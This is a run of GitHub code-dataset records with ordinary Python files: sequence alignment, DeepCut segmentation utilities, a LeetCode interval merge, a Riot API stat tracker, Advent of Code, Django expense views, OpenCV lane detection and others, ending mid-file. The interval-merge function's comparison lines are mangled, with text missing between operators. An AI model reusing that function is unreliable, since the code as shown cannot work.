described by edits\n\n >>> edit_dist(\"accaaagta\", \"cgacaaatgtcca\", 2, \"MDMMIMMMMIIM\")\n 5\n \"\"\"\n aligned_p, aligned_q = local_align(p, x, i, edits)\n dist = 0\n \n for i in range (len(aligned_p)):\n c_p = aligned_p[i]\n c_q = aligned_q[i]\n if c_p == '-' or c_q == '-':\n dist += 1\n elif c_p != c_q:\n dist += 1\n \n\n return dist","repo_name":"birc-gsa-2022/cigar-python-annesparks","sub_path":"src/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20846955964","text":"from torchvision import transforms\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom numba import njit\nfrom tqdm import tqdm\nfrom PIL import Image\nimport urllib.request\nimport numpy as np\nimport warnings\nimport torch\nimport math\nimport cv2\n\ncmap = 'tab20'\ndef save_or_show(arr, filename, dir, save=False):\n if save:\n plt.imsave(dir + filename + '_org' + '.png', arr[0], cmap=cmap)\n plt.imsave(dir + filename + '_mask' + '.png', arr[1], cmap=cmap)\n plt.imsave(dir + filename + '_fused' + '.png', arr[2], cmap=cmap)\n else:\n im_show_n(arr, 3, 'org, mask, fused')\n\n\ndef graph_to_mask(S, cc, stride, image_tensor, image):\n # Reshape clustered graph\n minus = 1 if stride == 4 else 0\n # -1 is needed only for stride==4 of descriptor extraction\n S = np.array(torch.reshape(S, (\n int(image_tensor.shape[2] // stride) - minus, int(image_tensor.shape[3] // stride) - minus)))\n\n # check if background is 0 and main object is 1 in segmentation map\n if (S[0][0] + S[S.shape[0] - 1][0] + S[0][S.shape[1] - 1] + S[S.shape[0] - 1][S.shape[1] - 1]) > 2:\n S = 1 - S\n\n # chose largest component (for k == 2)\n if cc:\n S = largest_cc(S)\n\n # mask to original image size\n mask = cv2.resize(S.astype('float'), (image[:, :, 0].shape[1], image[:, :, 0].shape[0]),\n interpolation=cv2.INTER_NEAREST)\n\n S = torch.tensor(np.reshape(S, (S.shape[0] * S.shape[0],))).type(torch.LongTensor)\n\n return mask, S\n\ndef create_adj(F, cut, alpha=1):\n W = F @ F.T\n # if NCut\n if cut == 0: \n # threshold\n W = W * (W > 0)\n # norm\n W = W / W.max()\n # if CC\n else:\n W = W - (W.max() / alpha)\n \n return W\n\ndef im_show_n(im_arr, n, title):\n \"\"\"\n Display images N in a row from arbitrary number of images in a list\n :param im_arr: array of images\n :param n: Number of subplots in a row\n :param title: Window name\n @author:Amit\n \"\"\"\n fig, axes = plt.subplots(len(im_arr) // n if len(im_arr) % n == 0 else len(im_arr) // n + 1, n, squeeze=False,\n dpi=200)\n\n count = 0\n for i in range(len(im_arr)):\n axes[count // n][count % n].imshow(im_arr[i])\n axes[count // n][count % n].axis('off')\n count = count + 1\n # Delete axis for non-full rows\n for i in range(len(im_arr) + 1, n):\n axes[count // n][count % n].axis('off')\n count = count + 1\n\n fig.canvas.manager.set_window_title(title)\n fig.suptitle(title)\n plt.show()\n # plt.savefig('./try.png')\n\n\n@njit()\ndef discr_ncut(A, B, deg, W):\n \"\"\"\n Calculate discrete normalized-cut of a given graph for k=2 cut.\n @param A: First cluster of nodes\n @param B: Second cluster of nodes\n @param deg: Array of node degrees\n @param W: Adjacency matrix\n @return: Normalized-cut value\n \"\"\"\n # sum of cut edges\n cut_size = 0\n for i in range(A[0].shape[0]):\n for j in range(B[0].shape[0]):\n cut_size = cut_size + W[A[0][i]][B[0][j]]\n # sum of out degrees\n ncut = 1. / np.sum(deg[A[0]]) + 1. 
/ np.sum(deg[B[0]])\n ncut = cut_size * ncut\n\n return ncut\n\n# suggested use of discr_ncut\n\"\"\"\nfrom torch_geometric.utils import degree\n\nsum of cut edges\ndeg = degree(edge_index[0])\nA = np.where(S == 0)\nB = np.where(S == 1)\nncut = discr_ncut(A, B, np.array(deg), W)\n\"\"\"\n\n\ndef load_data(adj, node_feats):\n \"\"\"\n Load data to pytorch-geometric data format\n @param adj: Adjacency metrix of a graph\n @param node_feats: Feature matrix of a graph\n @return: Graph in pytorch-geometric data format\n \"\"\"\n node_feats = torch.from_numpy(node_feats)\n edge_index = torch.from_numpy(np.array(np.nonzero((adj > 0))))\n row, col = edge_index\n edge_weight = torch.from_numpy(adj[row, col])\n\n return node_feats, edge_index, edge_weight\n\n\ndef load_data_img(chosen_dir, image_size):\n \"\"\"\n Load image to model (Resize, To tensor, normalize)\n @param chosen_dir: Directory for loaded image\n @param image_size: Output size for image\n @return: Resized image as a tensor and original image as a tuple\n \"\"\"\n # Load image\n pil_image = Image.open(chosen_dir).convert('RGB')\n\n # Define transformations\n prep = transforms.Compose([\n transforms.Resize(image_size, interpolation=transforms.InterpolationMode.LANCZOS),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))\n ])\n\n # Resized image tensor\n image_tensor = prep(pil_image)[None, ...]\n\n # To numpy array\n image = np.array(pil_image)\n\n return image_tensor, image\n\n\ndef largest_cc(S):\n \"\"\"\n Gets a segmentation map and finds the largest connected component, discards the rest of the segmentation map.\n @param S: Segmentation map\n @return: Largest connected component in given segmentation map\n \"\"\"\n us_cc = cv2.connectedComponentsWithStats(S.astype('uint8'), connectivity=4)\n # get indexes of sorted sizes for CCs\n us_cc_stat = us_cc[2]\n cc_idc = np.argsort(us_cc_stat[:, -1])[::-1]\n # decision rule for crop\n if np.percentile(S[us_cc[1] == cc_idc[0]], 99) == 0:\n # 99th percentile of biggest connected component is 0 -> cc_idc[0] is background\n mask: np.ndarray = np.equal(us_cc[1], cc_idc[1])\n elif np.percentile(S[us_cc[1] == cc_idc[1]], 99) == 0:\n # 99th percentile of 2nd biggest connected component is 0 -> cc_idc[0] is background\n mask: np.ndarray = np.equal(us_cc[1], cc_idc[0])\n else:\n raise NotImplementedError('No valid decision rule for cropping')\n\n return mask\n\n\ndef apply_seg_map(img, seg, alpha):\n \"\"\"\n Overlay segmentation map onto an image, the function is jited for performance.\n @param img: input image as numpy array\n @param seg: input segmentation map as a numpy array\n @param alpha: The opacity of the segmentation overlay, 0==transparent, 1==only segmentation map\n @return: segmented image as a numpy array\n \"\"\"\n plt.imsave('./tmp/tmp.png', seg, cmap=cmap)\n seg = (plt.imread('./tmp/tmp.png')[:,:,:3] * 255).astype(np.uint8)\n return ((seg * alpha) + (img * (1 - alpha))).astype(np.uint8)\n\ndef _no_grad_trunc_normal_(tensor, mean, std, a, b):\n # Cut & paste from PyTorch official master until it's in a few official releases - RW\n # Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf\n def norm_cdf(x):\n # Computes standard normal cumulative distribution function\n return (1. + math.erf(x / math.sqrt(2.))) / 2.\n\n if (mean < a - 2 * std) or (mean > b + 2 * std):\n warnings.warn(\"mean is more than 2 std from [a, b] in nn.init.trunc_normal_. 
\"\n \"The distribution of values may be incorrect.\",\n stacklevel=2)\n\n with torch.no_grad():\n # Values are generated by using a truncated uniform distribution and\n # then using the inverse CDF for the normal distribution.\n # Get upper and lower cdf values\n l = norm_cdf((a - mean) / std)\n u = norm_cdf((b - mean) / std)\n\n # Uniformly fill tensor with values from [l, u], then translate to\n # [2l-1, 2u-1].\n tensor.uniform_(2 * l - 1, 2 * u - 1)\n\n # Use inverse cdf transform for normal distribution to get truncated\n # standard normal\n tensor.erfinv_()\n\n # Transform to proper mean, std\n tensor.mul_(std * math.sqrt(2.))\n tensor.add_(mean)\n\n # Clamp to ensure it's in the proper range\n tensor.clamp_(min=a, max=b)\n return tensor\n\n\ndef trunc_normal_(tensor, mean=0., std=1., a=-2., b=2.):\n return _no_grad_trunc_normal_(tensor, mean, std, a, b)\n\n\nclass DownloadProgressBar(tqdm):\n def update_to(self, b=1, bsize=1, tsize=None):\n if tsize is not None:\n self.total = tsize\n self.update(b * bsize - self.n)\n\n\ndef download_url(url, output_path):\n with DownloadProgressBar(unit='B', unit_scale=True,\n miniters=1, desc=url.split('/')[-1]) as t:\n urllib.request.urlretrieve(url, filename=output_path, reporthook=t.update_to)\n","repo_name":"SAMPL-Weizmann/DeepCut","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8175,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"1846498674","text":"class Solution(object):\n def sub_merge(self, interval_1, interval_2):\n # 对两个有序区间的合并\n l1, r1 = interval_1[0], interval_1[1]\n l2, r2 = interval_2[0], interval_2[1]\n if r1=l2 and r1=l2 and r1>=r2:\n # interval_1包含intervals_2\n return [[l1, r1]]\n\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n if len(intervals) == 0:\n return intervals\n # 先按左区间升序排序\n for i in range(len(intervals)-1):\n for j in range(i+1, len(intervals)):\n if intervals[i][0] > intervals[j][0]:\n temp = intervals[i]\n intervals[i] = intervals[j]\n intervals[j] = temp\n \n ret = [intervals[0]]\n for i in range(1, len(intervals)):\n sub_ret = self.sub_merge(ret[-1], intervals[i])\n ret.pop()\n ret.extend(sub_ret)\n \n return ret\n\ntest_sample = [[1, 4], [0, 1]]\nsl = Solution()\nprint(sl.merge(test_sample))","repo_name":"zhengsizuo/leetcode-zhs","sub_path":"排序/56-合并区间.py","file_name":"56-合并区间.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30515012388","text":"from riotwatcher import LolWatcher, ApiError\nimport json\nimport os\n\n# set working directory\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\n# importing the config file\nwith open(\"config.json\") as config_file:\n config_info = json.load(config_file)\n\n # loading config info\n lol_watcher = LolWatcher(config_info[\"APIKEY\"])\n my_region = config_info[\"REGION\"]\n sum_name = config_info[\"SUM_NAME\"]\n num_games = config_info[\"NUM_GAMES\"]\n champ_id = config_info[\"CHAMPIONID\"] # can be found in data dragon json file\n\n# pulling profile and ranked info from api\nme = lol_watcher.summoner.by_name(my_region, sum_name)\nmy_ranked_stats = lol_watcher.league.by_summoner(my_region, me['id'])\n\n# checking for api errors\ntry:\n response = lol_watcher.summoner.by_name(my_region, sum_name)\nexcept ApiError as err:\n if err.response.status_code == 429:\n print('We should retry in {} seconds.'.format(\n 
err.headers['Retry-After']))\n print('this retry-after is handled by default by the RiotWatcher library')\n print('future requests wait until the retry-after time passes')\n elif err.response.status_code == 404:\n print('Summoner name not found, check the config file.')\n else:\n raise\n\n# getting total wins and total games played\nwins = my_ranked_stats[0][\"wins\"]\ntotal_games_played = wins + my_ranked_stats[0][\"losses\"]\n\n# getting mastery points from api\nmastery_points = lol_watcher.champion_mastery.by_summoner_by_champion(my_region, me[\"id\"], champ_id)[\"championPoints\"]\n\n# opening the match data file\nwith open(\"match_data.json\") as match_json_file:\n # save the data if the file has any\n if os.path.getsize(\"match_data.json\") != 0:\n match_json_data = json.load(match_json_file)\n else:\n # create a dictionary to save the data\n match_json_data = {}\n\n# reading the match data\nmatchlist = lol_watcher.match.matchlist_by_puuid(\"NA1\", me[\"puuid\"], 0, num_games, type=\"ranked\")\n\n# checking if the match is already in the list\nfor index, matches in enumerate(matchlist):\n existing = False\n for existing_matches in match_json_data:\n if matches == existing_matches:\n existing = True\n\n # saving the data for each match\n if existing == False:\n match_json_data[matches] = {}\n\n kills = 0\n assists = 0\n blue_side_kills = 0\n red_side_kills = 0\n total_kills = 0\n my_team = 0\n deaths = 0\n cs = 0\n gametime = 0\n win = False\n\n # read the players in the selected match\n selected_match = lol_watcher.match.by_id(my_region, matches)[\"info\"]\n participants = selected_match[\"participants\"]\n\n # save the match length\n match_json_data[matches][\"gametime\"] = selected_match[\"gameDuration\"]\n\n # iterate through each player in the match\n for people in participants:\n # finding total team kills per side\n if people[\"teamId\"] == 100:\n blue_side_kills += people[\"kills\"]\n if people[\"teamId\"] == 200:\n red_side_kills += people[\"kills\"]\n \n # checking for desired summoner\n if people[\"summonerName\"] == sum_name:\n # saving their data for that match\n my_team = people[\"teamId\"]\n kills += people[\"kills\"]\n assists += people[\"assists\"]\n deaths += people[\"deaths\"]\n cs += people[\"totalMinionsKilled\"] + \\\n people[\"neutralMinionsKilled\"]\n if people[\"win\"] == True:\n match_json_data[matches][\"win\"] = True\n else:\n match_json_data[matches][\"win\"] = False\n\n # finding total team kills for the desired summoner's team\n if my_team == 100:\n total_kills += blue_side_kills\n if my_team == 200:\n total_kills += red_side_kills\n\n # writing the desired summoner's match data\n match_json_data[matches][\"kills\"] = kills\n match_json_data[matches][\"deaths\"] = deaths\n match_json_data[matches][\"assists\"] = assists\n match_json_data[matches][\"cs\"] = cs\n match_json_data[matches][\"total_kills\"] = total_kills\n else: break\n\n# write the match info to the file\nwith open(\"match_data.json\", \"w\") as match_json_file:\n match_json_file.write(json.dumps(match_json_data, indent=2))\n\nkp = 0\nkda = 0\nwr20g = 0\ncspm = 0\nwin20g = 0\nloss20g = 0\nsum_kills = 0\nsum_assists = 0\nsum_total_kills = 0\nsum_deaths = 0\nsum_cs = 0\nsum_gametime = 0\n\n# loop through each match in the finalized data\nfor index, matches in enumerate(match_json_data):\n # check first 20 games for winrate\n if index < 20:\n # finding 20 game winrate\n if match_json_data[matches][\"win\"] == True:\n win20g += 1\n if match_json_data[matches][\"win\"] == False:\n loss20g += 1\n 
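 # Hedged aside (illustrative numbers only): kp computed below is kill
 # participation, the share of the team's kills the summoner took part in,
 # e.g. 5 kills + 7 assists out of 30 team kills -> round(100 * 12 / 30) = 40.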
# sum of desired summoner's stats\n sum_gametime += match_json_data[matches][\"gametime\"]\n sum_kills += match_json_data[matches][\"kills\"]\n sum_deaths += match_json_data[matches][\"deaths\"]\n sum_assists += match_json_data[matches][\"assists\"]\n sum_cs += match_json_data[matches][\"cs\"]\n sum_total_kills += match_json_data[matches][\"total_kills\"]\n\n# calculations for desired summoner's stats\nkp = round(100*(sum_kills + sum_assists)/sum_total_kills)\nkda = round((sum_kills + sum_assists)/sum_deaths, 2)\nwr20g = round(100*win20g/(loss20g+win20g))\ncspm = round(sum_cs/(sum_gametime/60), 2)\n\n# writing final data to files to be read by obs\nwith open(\"top_left.txt\", \"w\") as top_left, open(\"top_right.txt\", \"w\") as top_right:\n top_left.write(\"Overall WR: {}%\\n\".format(round(wins / total_games_played*100)))\n top_left.write(\"WR (20 Games): {}%\\n\".format(round(wr20g)))\n top_left.write(\"Rank: {} {}\\n\".format(my_ranked_stats[0][\"tier\"], my_ranked_stats[0][\"rank\"]))\n top_left.write(\"LP: {}\".format(my_ranked_stats[0][\"leaguePoints\"]))\n\n top_right.write(\"MASTERY POINTS: {}K\\n\".format(round(mastery_points/1000, 1)))\n top_right.write(\"KDA: {}\\n\".format(kda))\n top_right.write(\"KP: {}%\\n\".format(kp))\n top_right.write(\"CS/MIN: {}\".format(cspm))\n","repo_name":"amckillican/LOLStatTracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73835468089","text":"\"\"\"\n# Rucksack Reorganization\nAdvent Of Code, Day 3\nhttps://adventofcode.com/2022/day/3\n\n## Rules\n\nSuppose you have the following list of contents from six rucksacks:\n\n -------------------------------- \n vJrwpWtwJgWrhcsFMMfFFhFp\n jqHRNqRjqzjGDLGLrsFMfFZSrLrFZsSL\n PmmdzqPrVvPwwTWBwg\n wMqvLMZHhHMvwLHjbvcjnnSBnvTQFn\n ttgJtRGJQctTZtZT\n CrZsJsPPZsGzwwsLwLmpwMDw\n -------------------------------- \n \n - The first rucksack contains the items vJrwpWtwJgWrhcsFMMfFFhFp, which means its first compartment contains the items vJrwpWtwJgWr, while the second compartment contains the items hcsFMMfFFhFp. The only item type that appears in both compartments is lowercase p.\n - The second rucksack's compartments contain jqHRNqRjqzjGDLGL and rsFMfFZSrLrFZsSL. 
The only item type that appears in both compartments is uppercase L.\n - The third rucksack's compartments contain PmmdzqPrV and vPwwTWBwg; the only common item type is uppercase P.\n - The fourth rucksack's compartments only share item type v.\n - The fifth rucksack's compartments only share item type t.\n - The sixth rucksack's compartments only share item type s.\n\nTo help prioritize item rearrangement, every item type can be converted to a priority:\n\n - Lowercase item types a through z have priorities 1 through 26.\n - Uppercase item types A through Z have priorities 27 through 52.\n\nIn the above example, the priority of the item type that appears in both compartments of each rucksack is 16 (p), 38 (L), 42 (P), 22 (v), 20 (t), and 19 (s); the sum of these is 157.\n\n\n## Part 1:\nFind the sum of the priorities of the item types that appear in both compartments of each rucksack.\n\n\"\"\"\n\n# Declare sum of priorities\npriorities = 0\n\nwith open(\"input.txt\", \"r\") as file:\n for line in file:\n\n # Helper to break from loops: \n # \"True\" if item that appears in both rucksack's compartments is found\n # \"False\" by default - resets on each rucksack iteration\n found = False\n\n # Amount of items in rucksack\n items = len(line.rstrip())\n\n # Go through the first rucksack's compartment\n for i in range(items // 2):\n\n if found == True:\n break\n \n # Go through the second rucksack's compartment\n for j in range(items // 2, items):\n\n if found == True:\n break\n\n if line[i] == line[j]:\n\n found = True\n\n # Check for letter case and add priorities accordingly\n # 1. Use \"ord\" method to convert character to ASCII decimal\n # 2. Subtract number according to letter case to get proper amount of priorities\n if line[i] == line[i].upper():\n priorities += ord(line[i]) - 38\n\n elif line[i] == line[i].lower():\n priorities += ord(line[i]) - 96\n \n\n# Print sum of priorities\nprint(priorities)","repo_name":"chtozamm/AdventOfCode-2022","sub_path":"Day 3/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29630551101","text":"from os import listdir, system\nfrom os.path import isfile, join, dirname\n\nscriptDir = dirname(__file__)\nextensionsPath = '../packages/extensions'\ndirPath = join(scriptDir, extensionsPath)\nextensionFiles = [f for f in listdir(dirPath) if isfile(join(dirPath, f))]\n\nfor extensionFile in extensionFiles:\n system('code --install-extension {}/{}'.format(dirPath, extensionFile))\n","repo_name":"triggerScript/vscode-pack","sub_path":"src/vscode-install.py","file_name":"vscode-install.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70824884730","text":"import os\nimport re\nfrom json import JSONDecodeError\nfrom typing import Generator, Iterator, List, Optional, Union\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nDATA_DIR = os.path.join(BASE_DIR, \"data\")\n\n\ndef load_data(file_name: str) -> Generator:\n \"\"\"Check file_name in data directory and read the file\"\"\"\n\n try:\n with open(f'{DATA_DIR}/{file_name}', 'r', encoding='utf-8') as file:\n for row in file:\n yield row\n except (FileNotFoundError, JSONDecodeError):\n return 'No such file in directory', 400\n\n\ndef regex(data: Iterator, reg_exp: str) -> Iterator:\n \"\"\"Filter data by regular expression\"\"\"\n\n return filter(lambda line: 
re.search(f'{reg_exp}', line), data)\n\n\ndef filter_data(data: Iterator, value: Optional[str]) -> Iterator:\n \"\"\"Filter data by value\"\"\"\n\n return filter(lambda l: value in l, data)\n\n\ndef map_data(data: Iterator, value: Union[str, int]) -> Iterator:\n \"\"\"Split data byt space and return the value column\"\"\"\n\n map_value = int(value)\n return map(lambda l: l.split(' ')[map_value], data)\n\n\ndef limit_result(data: Union[Generator, Iterator], limit_value: str) -> List[str]:\n \"\"\"Return limited by limit_value number of lines\"\"\"\n\n int_limit = int(limit_value)\n return list(data)[:int_limit]\n\n\ndef result_data(file_name: str, commands_dict: dict) -> Iterator:\n \"\"\"Receive data and process it depending on the request\n commands and values and return processing result\"\"\"\n\n result: Iterator = load_data(file_name=file_name)\n if 'filter' in commands_dict.keys():\n result = filter_data(result, commands_dict.get('filter'))\n\n if 'map' in commands_dict.keys():\n result = map_data(result, commands_dict.get('map'))\n\n if 'regex' in commands_dict.keys():\n result = regex(result, commands_dict.get('regex'))\n\n if 'sort' in commands_dict.keys():\n if commands_dict['sort'] == 'desc':\n result = sorted(list(result), reverse=True)\n else:\n result = sorted(list(result))\n\n if 'limit' in commands_dict.keys():\n result = limit_result(result, commands_dict.get('limit'))\n elif \"unique\" in commands_dict.keys():\n result = list(set(result))\n return result\n","repo_name":"VaDmitrii/hw24_DV","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74477198329","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('morador', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='veiculo',\n name='ano',\n field=models.IntegerField(),\n ),\n ]\n","repo_name":"ivandiniz/CondoPrime","sub_path":"morador/migrations/0002_auto_20150812_2116.py","file_name":"0002_auto_20150812_2116.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28588603855","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .models import Trip, Transaction\nimport django.utils.timezone as tz\nimport numpy as np\nimport pandas as pd\n\ndef index(request):\n trips = Trip.objects.all()\n context={\n 'trips' : trips\n }\n return render(request, 'index3.html', context)\n\ndef insert_trip(request):\n return render(request, 'insert.html')\n\ndef insert_trip_value(request):\n if request.method == 'POST':\n trip_name = request.POST['trip_name']\n description = request.POST['description']\n members_data = request.POST['members']\n members = list(members_data.split(','))\n # print(members)\n\n t = Trip(trip_name=trip_name, description=description, date=tz.localtime(), members=members)\n t.save()\n\n trips = Trip.objects.all()\n context={\n 'trips' : trips\n }\n # return render(request, 'index3.html', context)\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n else:\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n # return render(request, 'insert.html')\n\ndef delete_trip(request, trip_id):\n # trip_id = 
request.POST['delete_value_trip']\n\n Trip.objects.filter(id=trip_id).delete()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef insert_trans_value(request, trip_id):\n if request.method == 'POST':\n print(trip_id)\n trip = Trip.objects.get(id=trip_id)\n # print(trip)\n amt_from = request.POST['amt_from']\n amount_to_data = request.POST['amount_to']\n amount_to = list(amount_to_data.split(','))\n amount = request.POST['amount']\n trans = Transaction(trip_name=trip, amt_from=amt_from, amount_to=amount_to, amount=amount)\n trans.save()\n # trip = Trip.objects.all()[-1]\n # trans.Trip.add(trip)\n\n # trans = Transaction.objects.filter(trip_name_id=trip_id)\n # context = {\n # \"trans\" : trans\n # }\n # return render(request, 'insert_trans.html',context)\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n else:\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef delete_trans(request, trip_id, trans_id):\n print(trip_id)\n # trans_id = request.POST['delete_value_trans']\n Transaction.objects.filter(id=trans_id).delete()\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef trip_expand(request, trip_id):\n # trip = Trip.objects.get()\n trans = Transaction.objects.filter(trip_name_id=trip_id)\n trip = Trip.objects.filter(id=trip_id)\n context = {\n \"trip_name\":trip,\n \"trans\" : trans\n }\n return render(request, 'insert_trans.html', context)\n\ndef analysis_trans(request, trip_id):\n data = Transaction.objects.filter(trip_name_id=trip_id)\n data2 = Transaction.objects.filter(trip_name_id=trip_id)\n # print(\"Trans\")\n # print(type(trans))\n # print(trans[0])\n # print(trans)\n trip = Trip.objects.get(id=trip_id)\n names = trip.members\n # print(type(xnames))\n # print(xnames)\n matrix = np.zeros([len(names),len(names)])\n # names = ['A','B','C','D']\n df = pd.DataFrame(matrix, index=names, columns=names)\n\n matrix = data_to_matrix(df,data,names)\n analysis1 = analysis_1(matrix,names)\n\n analysis2 = analysis_2(matrix,names)\n\n analysis3 = analysis_3(matrix,names)\n\n context = {\n 'transactions' : data2,\n 'names' : names,\n 'analysis1' : analysis1,\n 'analysis2' : analysis2,\n 'analysis3' : analysis3\n }\n # print(matrix)\n return render(request, 'analysis.html', context)\n\ndef data_to_matrix(df,data,names):\n for row in data:\n amt_from = row.amt_from\n amt_to = row.amount_to\n amount = row.amount\n for col in amt_to:\n df[col][amt_from] += amount//len(amt_to)\n return df\ndef analysis_1(mat, names):\n a1 = []\n for name in names:\n a1.append((name,mat[name][name]))\n #print(name+\" : \"+str(mat[name][name]))\n return a1\n\n#spend by him\ndef analysis_2(mat, names):\n a2 = []\n for name in names:\n amt = 0\n for itr in names:\n amt += mat[itr][name]\n a2.append((name,amt))\n # print(name+\" : \"+str(amt))\n return a2\n\n#amount that has needs to be given to others\ndef analysis_3(mat, names):\n a3 = []\n for name in names:\n for itr in names:\n if mat[itr][name] != 0 and itr!=name:\n # print(itr+\"->\"+name+\" : \"+str(mat[itr][name]))\n a3.append([itr,name,mat[itr][name]])\n return a3\n","repo_name":"Saketh7382/projectRohini","sub_path":"Trip_cost/trips/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22881082905","text":"#!/usr/bin/env python\nimport numpy as np\nimport math\nimport cv2\n\nfilename = '01855_32_0.png'\norg_img = cv2.imread(filename)\nimg = np.copy(org_img) 
#create a copy of org_img\n#cv2.imshow('org_img', org_img)\n\n####################################\n#1) Convert to gray scale\ngray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n#cv2.imshow('gray_img', gray_img)\n\n####################################\n#2) Gaussian blur\nblur_img = cv2.GaussianBlur(org_img, (5,5), 0)\n#cv2.imshow('blur_img', blur_img)\n\n\n####################################\n#3) Canny edge detection (display the edge image)\nedges = cv2.Canny(org_img, 150, 200)\n#cv2.imshow('edges', edges)\n\n\n#####################################\n#Apply ROI\nmask = np.zeros_like(edges)\nvertices = [np.array([[0,480], [0, 350], [340, 200], [640, 350], [640, 480]], dtype = np.int32)]\ncv2.fillPoly(mask, vertices, (255,255,255))\nedges_ROI = cv2.bitwise_and(edges, mask)\n#cv2.imshow('mask', mask)\n#cv2.imshow('masked', masked)\n\n\n\n####################################\n#s4) Hough transform (display the line image)\n\n\nedges_copy = np.copy(edges_ROI)\nthreshold = 10\nminLineLength = 30\nmaxLineGap = 10\nlines = cv2.HoughLinesP(\n\tedges_copy,\n\t1, # rho\n\tnp.pi / 180, #theta\n\tthreshold, #threshold\n\tnp.array([]), #lines\n\tminLineLength, #min line length\n\tmaxLineGap #max line gap\n\t)\n\n# Use the following code to create a line image\nline_img = np.zeros((img.shape[0],img.shape[1],3),dtype=np.uint8)\nline_color=[0, 255, 0]\nline_thickness=1\ndot_color = [0, 255, 0]\ndot_size = 3\nfor line in lines:\n for x1, y1, x2, y2 in line:\n cv2.line(line_img, (x1, y1), (x2, y2), line_color, line_thickness)\n cv2.circle(line_img, (x1, y1), dot_size, dot_color, -1)\n cv2.circle(line_img, (x2, y2), dot_size, dot_color, -1)\n#cv2.imshow('lines', line_img)\n\n\n####################################\n#5) Overlay (i.e., blend) the line image with the original image\noverlay = cv2.addWeighted(org_img, 0.8, line_img, 1.0, 0.0)\ncv2.imshow('overlay', overlay)\n\n'''\n####################################\nslopes = []\nlines_rev = []\nfor line in lines:\n\tfor x1, y1, x1, y2 in line:\t\t\n\t\ts = 0\n\t\tif x2-x1 != 0:\n\t\t\ts = float((y2-y1)/(x2-x1))\t\t\t\n\t\telse:\n\t\t\tslopes.extend([9999])\n\t\tif s < 1:# & s > 0.3:\n\t\t\t\tlines_rev = line\n\t\t\n\nfor line in lines_rev:\n for x1, y1, x2, y2 in line:\n cv2.line(line_img, (x1, y1), (x2, y2), line_color, line_thickness)\n cv2.circle(line_img, (x1, y1), dot_size, dot_color, -1)\n cv2.circle(line_img, (x2, y2), dot_size, dot_color, -1)\n\n#for slope in slopes:\n#\tif slope < 1.0 && slope > 0.3:\n\n#slops_abs = abs(slopes)\n\n'''\n\n\ncv2.waitKey(0) #press any key to quit\ncv2.destroyAllWindows()","repo_name":"idenzer/vision_practice","sub_path":"line_detection_class_practice.py","file_name":"line_detection_class_practice.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21252408842","text":"import pandas as pd\nimport numpy as np\nimport streamlit as st\nimport re\nimport io\nimport datetime\nimport sys\n\nst.set_option('deprecation.showfileUploaderEncoding', False)\n\n\n@st.cache(allow_output_mutation=True)\ndef cleaning(dataset):\n\n df_orig.drop([x for x in dataset.columns if x.startswith(\"Unn\")], axis=1 , inplace=True)\n\n dataset['Data Negócio'] = pd.to_datetime(dataset['Data Negócio'],dayfirst=True)\n\n def correction(x):\n if \"C\" in x:\n x = \"C\"\n elif 'V' in x:\n x = \"V\"\n return x\n\n\n dataset['C/V']=dataset[\"C/V\"].apply(correction)\n\n def fracionario_to_normal(x):\n if x.endswith(\"F\"):\n x = x[:-1]\n return x\n\n 
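 # Hedged note (ticker name illustrative): on B3, fractional-market trades use
 # a trailing \"F\" on the ticker; fracionario_to_normal above, applied just
 # below, strips it so fractional and round-lot trades of the same stock
 # aggregate under one code, e.g. fracionario_to_normal(\"PETR4F\") -> \"PETR4\".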
